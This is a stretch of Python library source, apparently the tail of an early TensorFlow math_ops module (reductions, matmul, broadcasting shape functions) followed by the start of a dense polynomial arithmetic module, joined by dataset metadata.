del r_binary_op_wrapper
_OverrideBinaryOperatorHelper(add, "add")
_OverrideBinaryOperatorHelper(sub, "sub")
_OverrideBinaryOperatorHelper(mul, "mul")
_OverrideBinaryOperatorHelper(div, "div")
_OverrideBinaryOperatorHelper(mod, "mod")
def logical_xor(x, y, name="LogicalXor"):
"""x ^ y = (x | y) & ~(x & y)."""
# TODO(alemi) Make this a cwise op if people end up relying on it.
return logical_and(logical_or(x, y), logical_not(logical_and(x, y)),
name=name)
_OverrideBinaryOperatorHelper(logical_and, "and")
_OverrideBinaryOperatorHelper(logical_or, "or")
_OverrideBinaryOperatorHelper(logical_xor, "xor")
ops.Tensor._override_operator("__lt__", less)
ops.Tensor._override_operator("__le__", less_equal)
ops.Tensor._override_operator("__gt__", greater)
ops.Tensor._override_operator("__ge__", greater_equal)
def range(start, limit, delta=1, name="range"):
"""Creates a sequence of integers.
This operation creates a sequence of integers that begins at `start` and
extends by increments of `delta` up to but not including `limit`.
For example:
```
# 'start' is 3
# 'limit' is 18
# 'delta' is 3
tf.range(start, limit, delta) ==> [3, 6, 9, 12, 15]
```
Args:
start: A 0-D (scalar) of type `int32`. First entry in sequence.
limit: A 0-D (scalar) of type `int32`. Upper limit of sequence,
exclusive.
delta: A 0-D `Tensor` (scalar) of type `int32`. Optional. Default is 1.
Number that increments `start`.
name: A name for the operation (optional).
Returns:
An 1-D `int32` `Tensor`.
"""
return gen_math_ops._range(start, limit, delta, name=name)
@ops.RegisterShape("Range")
def _RangeShape(op):
start_value = tensor_util.ConstantValue(op.inputs[0])
limit_value = tensor_util.ConstantValue(op.inputs[1])
delta_value = tensor_util.ConstantValue(op.inputs[2])
if start_value is None or limit_value is None or delta_value is None:
return [tensor_shape.vector(None)]
else:
return [tensor_shape.vector(
(limit_value - start_value + delta_value - 1) / delta_value)]
# Reduction operations
def _ReductionDims(x, reduction_indices):
"""Returns range(0, rank(x)) if reduction_indices is None."""
if reduction_indices is not None:
return reduction_indices
else:
return range(0, array_ops.rank(x))
def reduce_sum(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the sum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1, 1, 1]]
# [1, 1, 1]]
tf.reduce_sum(x) ==> 6
tf.reduce_sum(x, 0) ==> [2, 2, 2]
tf.reduce_sum(x, 1) ==> [3, 3]
tf.reduce_sum(x, 1, keep_dims=True) ==> [[3], [3]]
tf.reduce_sum(x, [0, 1]) ==> 6
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._sum(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_mean(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the mean of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[1., 1. ]]
# [2., 2.]]
tf.reduce_mean(x) ==> 1.5
tf.reduce_mean(x, 0) ==> [1.5, 1.5]
tf.reduce_mean(x, 1) ==> [1., 2.]
```
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._mean(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_prod(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the product of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._prod(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_min(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the minimum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._min(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_max(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the maximum of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
Args:
input_tensor: The tensor to reduce. Should have numeric type.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._max(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_all(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical and" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]]
# [False, False]]
tf.reduce_all(x) ==> False
tf.reduce_all(x, 0) ==> [False, False]
tf.reduce_all(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._all(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def reduce_any(input_tensor, reduction_indices=None, keep_dims=False,
name=None):
"""Computes the "logical or" of elements across dimensions of a tensor.
Reduces `input_tensor` along the dimensions given in `reduction_indices`.
Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
entry in `reduction_indices`. If `keep_dims` is true, the reduced dimensions
are retained with length 1.
If `reduction_indices` has no entries, all dimensions are reduced, and a
tensor with a single element is returned.
For example:
```python
# 'x' is [[True, True]]
# [False, False]]
tf.reduce_any(x) ==> True
tf.reduce_any(x, 0) ==> [True, True]
tf.reduce_any(x, 1) ==> [True, False]
```
Args:
input_tensor: The boolean tensor to reduce.
reduction_indices: The dimensions to reduce. If `None` (the defaut),
reduces all dimensions.
keep_dims: If true, retains reduced dimensions with length 1.
name: A name for the operation (optional).
Returns:
The reduced tensor.
"""
return gen_math_ops._any(input_tensor, _ReductionDims(input_tensor,
reduction_indices),
keep_dims, name=name)
def matmul(a, b,
transpose_a=False, transpose_b=False,
a_is_sparse=False, b_is_sparse=False,
name=None):
"""Multiplies matrix `a` by matrix `b`, producing `a` * `b`.
The inputs must be two-dimensional matrices, with matching inner dimensions,
possibly after transposition.
Both matrices must be of the same type. The supported types are:
`float`, `double`, `int32`, `complex64`.
Either matrix can be transposed on the fly by setting the corresponding flag
to `True`. This is `False` by default.
If one or both of the matrices contain a lot of zeros, a more efficient
multiplication algorithm can be used by setting the corresponding
`a_is_sparse` or `b_is_sparse` flag to `True`. These are `False` by default.
For example:
```python
# 2-D tensor `a`
a = tf.constant([1, 2, 3, 4, 5, 6], shape=[2, 3]) => [[1. 2. 3.]
[4. 5. 6.]]
# 2-D tensor `b`
b = tf.constant([7, 8, 9, 10, 11, 12], shape=[3, 2]) => [[7. 8.]
[9. 10.]
[11. 12.]]
c = tf.matmul(a, b) => [[58 64]
[139 154]]
```
Args:
a: `Tensor` of type `float`, `double`, `int32` or `complex64`.
b: `Tensor` with same type as `a`.
transpose_a: If `True`, `a` is transposed before multiplication.
transpose_b: If `True`, `b` is transposed before multiplication.
a_is_sparse: If `True`, `a` is treated as a sparse matrix.
b_is_sparse: If `True`, `b` is treated as a sparse matrix.
name: Name for the operation (optional).
Returns:
A `Tensor` of the same type as `a`.
"""
with ops.op_scope([a, b], name, "MatMul") as name:
a = ops.convert_to_tensor(a, name="a")
b = ops.convert_to_tensor(b, name="b")
if a.dtype == types.float32 and (a_is_sparse or b_is_sparse):
return sparse_matmul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=a_is_sparse,
b_is_sparse=b_is_sparse,
name=name)
else:
return gen_math_ops._mat_mul(a, b,
transpose_a=transpose_a,
transpose_b=transpose_b,
name=name)
sparse_matmul = gen_math_ops._sparse_mat_mul
batch_matmul = gen_math_ops._batch_mat_mul
ops.RegisterShape("MatMul")(common_shapes.matmul_shape)
ops.RegisterShape("SparseMatMul")(common_shapes.matmul_shape)
def _as_indexed_slices(x):
"""Convert 'x' to IndexedSlices.
Convert a dense Tensor to a block-sparse IndexedSlices.
Args:
x: Either a Tensor object, or an IndexedSlices object.
Returns:
An IndexedSlices object.
Raises:
TypeError: If 'x' is not a Tensor or an IndexedSlices object.
"""
# TODO(touts): op_scope
if not isinstance(x, (ops.Tensor, ops.IndexedSlices)):
raise TypeError("Not a Tensor or IndexedSlices: %s" % type(x))
if isinstance(x, ops.IndexedSlices):
return x
x_shape = array_ops.shape(x)
return ops.IndexedSlices(x, range(0, x_shape[0]), x_shape)
def _as_indexed_slices_list(inputs):
"""Convert all elements of 'inputs' to IndexedSlices.
Additionally, homogenize the types of all the indices to
either int32 or int64.
Args:
inputs: List containing either Tensor or IndexedSlices objects.
Returns:
A list of IndexedSlices objects.
Raises:
TypeError: If 'inputs' is not a list or a tuple.
"""
if not isinstance(inputs, (list, tuple)):
raise TypeError("Expected a list or tuple, not a %s" % type(inputs))
outputs = [_as_indexed_slices(i) for i in inputs]
with_int32_index = [o.indices for o in outputs
if o.indices.dtype == types.int32]
if not with_int32_index or len(with_int32_index) == len(outputs):
return outputs
casted_outputs = []
for o in outputs:
if o.indices.dtype == types.int32:
casted_outputs.append(
ops.IndexedSlices(o.values, cast(o.indices, types.int64),
o.dense_shape))
else:
casted_outputs.append(o)
return casted_outputs
def accumulate_n(inputs, shape=None, tensor_dtype=None, name=None):
"""Returns the element-wise sum of a list of tensors.
Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
otherwise, these are inferred.
For example:
```python
# tensor 'a' is [[1, 2], [3, 4]
# tensor `b` is [[5, 0], [0, 6]]
tf.accumulate_n([a, b, a]) ==> [[7, 4], [6, 14]]
# Explicitly pass shape and type
tf.accumulate_n([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
==> [[7, 4], [6, 14]]
```
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
shape: Shape of elements of `inputs`.
tensor_dtype: The type of `inputs`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
if tensor_dtype is None:
if not inputs or not isinstance(inputs, (list, tuple)):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
if not all(x.dtype == inputs[0].dtype for x in inputs):
raise ValueError("inputs must be a list of at least one Tensor with the "
"same dtype and shape")
tensor_dtype = inputs[0].dtype
if shape is not None:
shape = tensor_shape.as_shape(shape)
else:
shape = tensor_shape.unknown_shape()
for input_tensor in inputs:
if isinstance(input_tensor, ops.Tensor):
shape = shape.merge_with(input_tensor.get_shape())
if not shape.is_fully_defined():
# TODO(pbar): Make a version of assign_add that accepts an uninitialized
# lvalue, and takes its shape from that? This would allow accumulate_n to
# work in all situations that add_n currently works.
raise ValueError("Cannot infer the shape of the accumulator for "
"accumulate_n. Pass the shape argument, or set the shape "
"of at least one of the inputs.")
with ops.op_scope(inputs, name, "AccumulateN") as name:
var = gen_state_ops._temporary_variable(shape=shape, dtype=tensor_dtype)
var_name = var.op.name
var = state_ops.assign(var, array_ops.zeros_like(inputs[0]))
update_ops = []
for input_tensor in inputs:
op = state_ops.assign_add(var, input_tensor, use_locking=True)
update_ops.append(op)
with ops.control_dependencies(update_ops):
return gen_state_ops._destroy_temporary_variable(var,
var_name=var_name,
name=name)
@ops.RegisterShape("BatchMatMul")
def _BatchMatMulShape(op):
"""Shape function for BatchMatMul op."""
a_shape = op.inputs[0].get_shape()
adj_a = op.get_attr("adj_x")
b_shape = op.inputs[1].get_shape()
adj_b = op.get_attr("adj_y")
if not a_shape.is_fully_defined() or not b_shape.is_fully_defined():
return [tensor_shape.unknown_shape()]
batch_dims = a_shape[:-2].merge_with(b_shape[:-2])
output_rows = a_shape[-1] if adj_a else a_shape[-2]
output_cols = b_shape[-2] if adj_b else b_shape[-1]
inner_a = a_shape[-2] if adj_a else a_shape[-1]
inner_b = b_shape[-1] if adj_b else b_shape[-2]
inner_a.assert_is_compatible_with(inner_b)
return [batch_dims.concatenate([output_rows, output_cols])]
def sigmoid(x, name=None):
"""Computes sigmoid of `x` element-wise.
Specifically, `y = 1 / (1 + exp(-x))`.
Args:
x: A Tensor with type `float`, `double`, `int32`, `complex64`, `int64`,
or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor with the same type as `x` if `x.dtype != qint32`
otherwise the return type is `quint8`.
"""
with ops.op_scope([x], name, "Sigmoid") as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops._sigmoid(x, name=name)
def tanh(x, name=None):
"""Computes hyperbolic tangent of `x` element-wise.
Args:
x: A Tensor with type `float`, `double`, `int32`, `complex64`, `int64`,
or `qint32`.
name: A name for the operation (optional).
Returns:
A Tensor with the same type as `x` if `x.dtype != qint32` otherwise
the return type is `quint8`.
"""
with ops.op_scope([x], name, "Tanh") as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops._tanh(x, name=name)
ops.RegisterShape("Abs")(common_shapes.unchanged_shape)
ops.RegisterShape("Ceil")(common_shapes.unchanged_shape)
ops.RegisterShape("Conj")(common_shapes.unchanged_shape)
ops.RegisterShape("Cos")(common_shapes.unchanged_shape)
ops.RegisterShape("Exp")(common_shapes.unchanged_shape)
ops.RegisterShape("Floor")(common_shapes.unchanged_shape)
ops.RegisterShape("Imag")(common_shapes.unchanged_shape)
ops.RegisterShape("Inv")(common_shapes.unchanged_shape)
ops.RegisterShape("IsFinite")(common_shapes.unchanged_shape)
ops.RegisterShape("IsInf")(common_shapes.unchanged_shape)
ops.RegisterShape("IsNan")(common_shapes.unchanged_shape)
ops.RegisterShape("Log")(common_shapes.unchanged_shape)
ops.RegisterShape("LogicalNot")(common_shapes.unchanged_shape)
ops.RegisterShape("Neg")(common_shapes.unchanged_shape)
ops.RegisterShape("Real")(common_shapes.unchanged_shape)
ops.RegisterShape("Rsqrt")(common_shapes.unchanged_shape)
ops.RegisterShape("Sign")(common_shapes.unchanged_shape)
ops.RegisterShape("Sin")(common_shapes.unchanged_shape)
ops.RegisterShape("Sqrt")(common_shapes.unchanged_shape)
ops.RegisterShape("Square")(common_shapes.unchanged_shape)
ops.RegisterShape("Sigmoid")(common_shapes.unchanged_shape)
ops.RegisterShape("Tanh")(common_shapes.unchanged_shape)
ops.RegisterShape("Cast")(common_shapes.unchanged_shape)
ops.RegisterShape("ComplexAbs")(common_shapes.unchanged_shape)
@ops.RegisterShape("Add")
@ops.RegisterShape("Complex")
@ops.RegisterShape("Div")
@ops.RegisterShape("Equal")
@ops.RegisterShape("Greater")
@ops.RegisterShape("GreaterEqual")
@ops.RegisterShape("Less")
@ops.RegisterShape("LessEqual")
@ops.RegisterShape("LogicalAnd")
@ops.RegisterShape("LogicalOr")
@ops.RegisterShape("Maximum")
@ops.RegisterShape("Minimum")
@ops.RegisterShape("Mod")
@ops.RegisterShape("Mul")
@ops.RegisterShape("NotEqual")
@ops.RegisterShape("Pow")
@ops.RegisterShape("Sub")
def _BroadcastShape(op):
"""Common shape function for binary operators that broadcast their inputs."""
shape_x = op.inputs[0].get_shape()
shape_y = op.inputs[1].get_shape()
if shape_x.ndims is None or shape_y.ndims is None:
return [tensor_shape.unknown_shape()]
# To compute the broadcasted dimensions, we zip together shape_x and shape_y,
# and pad with 1 to make them the same length.
broadcasted_dims = reversed(list(itertools.izip_longest(
reversed(shape_x.dims), reversed(shape_y.dims),
fillvalue=tensor_shape.Dimension(1))))
# Next we combine the dimensions according to the numpy broadcasting rules.
# http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html
return_dims = []
for (dim_x, dim_y) in broadcasted_dims:
if dim_x.value is None or dim_y.value is None:
# One or both dimensions is unknown. If either dimension is greater than
# 1, we assume that the program is correct, and the other dimension will
# be broadcast to match it.
# TODO(mrry): If we eliminate the shape checks in C++, we must still
# assert that the unknown dim is either 1 or the same as the known dim.
if dim_x.value is not None and dim_x.value > 1:
return_dims.append(dim_x)
elif dim_y.value is not None and dim_y.value > 1:
return_dims.append(dim_y)
else:
return_dims.append(None)
elif dim_x.value == 1:
# We will broadcast dim_x to dim_y.
return_dims.append(dim_y)
elif dim_y.value == 1:
# We will broadcast dim_y to dim_x.
return_dims.append(dim_x)
elif dim_x.value == dim_y.value:
# The dimensions are compatible, so output is the same size in that
# dimension.
return_dims.append(dim_x.merge_with(dim_y))
else:
raise ValueError("Incompatible shapes for broadcasting: %s and %s"
% (shape_x, shape_y))
return [tensor_shape.TensorShape(return_dims)]
@ops.RegisterShape("AddN")
def _AddNShape(op):
merged_shape = tensor_shape.unknown_shape()
for input_ in op.inputs:
merged_shape = merged_shape.merge_with(input_.get_shape())
return [merged_shape]
@ops.RegisterShape("Select")
def _SelectShape(op):
# All three inputs must have the same shape.
return [op.inputs[0].get_shape()
.merge_with(op.inputs[1].get_shape())
.merge_with(op.inputs[2].get_shape())]
@ops.RegisterShape("ArgMax")
@ops.RegisterShape("ArgMin")
def _ArgOpShape(op):
"""Common shape function for arg-reduction ops."""
dimension_shape = op.inputs[1].get_shape()
dimension_shape.assert_is_compatible_with(tensor_shape.scalar())
input_shape = op.inputs[0].get_shape()
if input_shape.ndims is None:
return [tensor_shape.unknown_shape()]
elif input_shape.ndims <= 1:
return [tensor_shape.scalar()]
dimension = tensor_util.ConstantValue(op.inputs[1])
if dimension is None:
return [tensor_shape.unknown_shape(ndims=input_shape.ndims - 1)]
elif 0 <= dimension and dimension < input_shape.ndims:
returned_shape = []
for i, dim in enumerate(input_shape.dims):
if i != dimension:
returned_shape.append(dim)
return [tensor_shape.TensorShape(returned_shape)]
else:
raise ValueError(
"dimension (%d) must be in the range [0, %d), where %d is the number "
"of dimensions in the input"
% (dimension, input_shape.ndims, input_shape.ndims))
@ops.RegisterShape("All")
@ops.RegisterShape("Any")
@ops.RegisterShape("Max")
@ops.RegisterShape("Mean")
@ops.RegisterShape("Min")
@ops.RegisterShape("Prod")
@ops.RegisterShape("Sum")
def _ReductionShape(op):
"""Common shape function for reduction ops."""
input_shape = op.inputs[0].get_shape()
reduction_indices = tensor_util.ConstantValue(op.inputs[1])
keep_dims = op.get_attr("keep_dims")
if reduction_indices is None or input_shape.ndims is None:
if keep_dims:
return [tensor_shape.unknown_shape(ndims=input_shape.ndims)]
else:
return [tensor_shape.unknown_shape()]
# Turn reduction_indices from scalar to vector if necessary
reduction_indices = np.ravel(reduction_indices)
for reduction_index in reduction_indices:
if reduction_index < 0 or reduction_index >= input_shape.ndims:
raise ValueError("Invalid reduction dimension %d for input with %d "
"dimensions" % (reduction_index, input_shape.ndims))
returned_dims = []
if keep_dims:
for i, dim in enumerate(input_shape.dims):
if i in reduction_indices:
returned_dims.append(1)
else:
returned_dims.append(dim)
else:
for i, dim in enumerate(input_shape.dims):
if i not in reduction_indices:
returned_dims.append(dim)
return [tensor_shape.TensorShape(returned_dims)]
@ops.RegisterShape("SegmentMax")
@ops.RegisterShape("SegmentMean")
@ops.RegisterShape("SegmentMin")
@ops.RegisterShape("SegmentProd")
@ops.RegisterShape("SegmentSum")
def _SegmentReductionShape(op):
"""Common shape function for segment reduction ops."""
data_shape = op.inputs[0].get_shape()
segment_ids_shape = op.inputs[1].get_shape()
segment_ids_shape.assert_has_rank(1)
return [tensor_shape.TensorShape([None]).concatenate(data_shape[1:])]
@ops.RegisterShape("SparseSegmentMean")
@ops.RegisterShape("SparseSegmentSum")
def _SparseSegmentReductionShape(op):
"""Common shape function for sparse segment reduction ops."""
data_shape = op.inputs[0].get_shape()
indices_shape = op.inputs[1].get_shape()
indices_shape.assert_has_rank(1)
segment_ids_shape = op.inputs[2].get_shape()
segment_ids_shape.assert_has_rank(1)
indices_shape.assert_is_compatible_with(segment_ids_shape)
return [tensor_shape.TensorShape([None]).concatenate(data_shape[1:])]
@ops.RegisterShape("SparseSegmentMeanGrad")
def _SparseSegmentMeanGradShape(op):
"""Shape function for the SparseSegmentMeanGrad op."""
input_shape = op.inputs[0].get_shape()
indices_shape = op.inputs[1].get_shape().with_rank(1)
unused_segment_ids_shape = op.inputs[2].get_shape().merge_with(indices_shape)
unused_output_dim0_shape = op.inputs[3].get_shape().merge_with(
tensor_shape.scalar())
output_dim0 = tensor_util.ConstantValue(op.inputs[3])
if output_dim0 is not None:
dim0 = output_dim0[0]
else:
dim0 = None
return [tensor_shape.TensorShape([dim0]).concatenate(input_shape[1:])]
@ops.RegisterShape("UnsortedSegmentSum")
def _UnsortedSegmentSumShape(op):
"""Shape function for UnsortedSegmentSum."""
data_shape = op.inputs[0].get_shape()
segment_ids_shape = op.inputs[1].get_shape()
mid = segment_ids_shape.ndims
if mid is None:
return [tensor_shape.unknown_shape()]
else:
num_segments = tensor_util.ConstantValue(op.inputs[2])
return [tensor_shape.TensorShape([num_segments]).concatenate(
data_shape[mid:])]
@ops.RegisterShape("LinSpace")
def _LinspaceShape(op):
num = tensor_util.ConstantValue(op.inputs[2])
return [tensor_shape.vector(num)]
| {
"repo_name": "liyu1990/tensorflow",
"path": "tensorflow/python/ops/math_ops.py",
"copies": "5",
"size": "38848",
"license": "apache-2.0",
"hash": -902587780172944600,
"line_mean": 31.3463780183,
"line_max": 86,
"alpha_frac": 0.6608319605,
"autogenerated": false,
"ratio": 3.496040316774658,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6656872277274658,
"avg_score": null,
"num_lines": null
} |
"""Arithmetics for dense recursive polynomials in ``K[x]`` or ``K[X]``."""
from .densebasic import (dmp_degree_in, dmp_one, dmp_one_p, dmp_slice_in,
dmp_strip, dmp_zero, dmp_zero_p, dmp_zeros)
from .polyconfig import query
def dup_add_term(f, c, i, K):
"""
Add ``c*x**i`` to ``f`` in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_add_term(x**2 - 1, ZZ(2), 4)
2*x**4 + x**2 - 1
"""
if not c:
return f
n = len(f)
m = n - i - 1
if i == n - 1:
return dmp_strip([f[0] + c] + f[1:], 0)
else:
if i >= n:
return [c] + [K.zero]*(i - n) + f
else:
return f[:m] + [f[m] + c] + f[m + 1:]
def dmp_add_term(f, c, i, u, K):
"""
Add ``c(x_2..x_u)*x_0**i`` to ``f`` in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_add_term(x*y + 1, 2, 2)
2*x**2 + x*y + 1
"""
if not u:
return dup_add_term(f, c, i, K)
v = u - 1
if dmp_zero_p(c, v):
return f
n = len(f)
m = n - i - 1
if i == n - 1:
return dmp_strip([dmp_add(f[0], c, v, K)] + f[1:], u)
else:
if i >= n:
return [c] + dmp_zeros(i - n, v, K) + f
else:
return f[:m] + [dmp_add(f[m], c, v, K)] + f[m + 1:]
def dup_mul_term(f, c, i, K):
"""
Multiply ``f`` by ``c*x**i`` in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_mul_term(x**2 - 1, ZZ(3), 2)
3*x**4 - 3*x**2
"""
if not c or not f:
return []
else:
return [cf * c for cf in f] + [K.zero]*i
def dmp_mul_term(f, c, i, u, K):
"""
Multiply ``f`` by ``c(x_2..x_u)*x_0**i`` in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_mul_term(x**2*y + x, 3*y, 2)
3*x**4*y**2 + 3*x**3*y
"""
if not u:
return dup_mul_term(f, c, i, K)
v = u - 1
if dmp_zero_p(f, u):
return f
if dmp_zero_p(c, v):
return dmp_zero(u)
else:
return [dmp_mul(cf, c, v, K) for cf in f] + dmp_zeros(i, v, K)
def dmp_mul_ground(f, c, u, K):
"""
Multiply ``f`` by a constant value in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_mul_ground(2*x + 2*y, ZZ(3))
6*x + 6*y
"""
if not u:
return dmp_strip([coeff * c for coeff in f], u)
else:
v = u - 1
return [dmp_mul_ground(coeff, c, v, K) for coeff in f]
def dmp_quo_ground(f, c, u, K):
"""
Quotient by a constant in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_quo_ground(2*x**2*y + 3*x, ZZ(2))
x**2*y + x
>>> R, x, y = ring('x y', QQ)
>>> R.dmp_quo_ground(2*x**2*y + 3*x, QQ(2))
x**2*y + 3/2*x
"""
if not u:
if not c:
raise ZeroDivisionError('polynomial division')
if not f:
return f
if K.is_Field:
return [K.quo(coeff, c) for coeff in f]
else:
return [coeff // c for coeff in f]
v = u - 1
return [dmp_quo_ground(coeff, c, v, K) for coeff in f]
def dmp_exquo_ground(f, c, u, K):
"""
Exact quotient by a constant in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', QQ)
>>> R.dmp_exquo_ground(x**2*y + 2*x, QQ(2))
1/2*x**2*y + x
"""
if not u:
if not c:
raise ZeroDivisionError('polynomial division')
if not f:
return f
return [K.exquo(coeff, c) for coeff in f]
v = u - 1
return [dmp_exquo_ground(coeff, c, v, K) for coeff in f]
def dup_lshift(f, n, K):
"""
Efficiently multiply ``f`` by ``x**n`` in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dup_lshift(x**2 + 1, 2)
x**4 + x**2
"""
if not f:
return f
else:
return f + [K.zero]*n
def dup_rshift(f, n, K):
"""
Efficiently divide ``f`` by ``x**n`` in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dup_rshift(x**4 + x**2, 2)
x**2 + 1
>>> R.dup_rshift(x**4 + x**2 + 2, 2)
x**2 + 1
"""
return f[:-n]
def dmp_abs(f, u, K):
"""
Make all coefficients positive in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_abs(x**2*y - x)
x**2*y + x
"""
if not u:
return [abs(coeff) for coeff in f]
else:
v = u - 1
return [dmp_abs(coeff, v, K) for coeff in f]
def dmp_neg(f, u, K):
"""
Negate a polynomial in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_neg(x**2*y - x)
-x**2*y + x
"""
if not u:
return [-coeff for coeff in f]
else:
v = u - 1
return [dmp_neg(coeff, v, K) for coeff in f]
def dup_add(f, g, K):
"""
Add dense polynomials in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_add(x**2 - 1, x - 2)
x**2 + x - 3
"""
if not f:
return g
if not g:
return f
df = dmp_degree_in(f, 0, 0)
dg = dmp_degree_in(g, 0, 0)
if df == dg:
return dmp_strip([a + b for a, b in zip(f, g)], 0)
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = g[:k], g[k:]
return h + [a + b for a, b in zip(f, g)]
def dmp_add(f, g, u, K):
"""
Add dense polynomials in ``K[X]``.
Examples
========
>>> R, x, y = ring('x y', ZZ)
>>> R.dmp_add(x**2 + y, x**2*y + x)
x**2*y + x**2 + x + y
"""
if not u:
return dup_add(f, g, K)
df = dmp_degree_in(f, 0, u)
if df < 0:
return g
dg = dmp_degree_in(g, 0, u)
if dg < 0:
return f
v = u - 1
if df == dg:
return dmp_strip([dmp_add(a, b, v, K) for a, b in zip(f, g)], u)
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = g[:k], g[k:]
return h + [dmp_add(a, b, v, K) for a, b in zip(f, g)]
def dup_sub(f, g, K):
"""
Subtract dense polynomials in ``K[x]``.
Examples
========
>>> R, x = ring('x', ZZ)
>>> R.dmp_sub(x**2 - 1, x - 2)
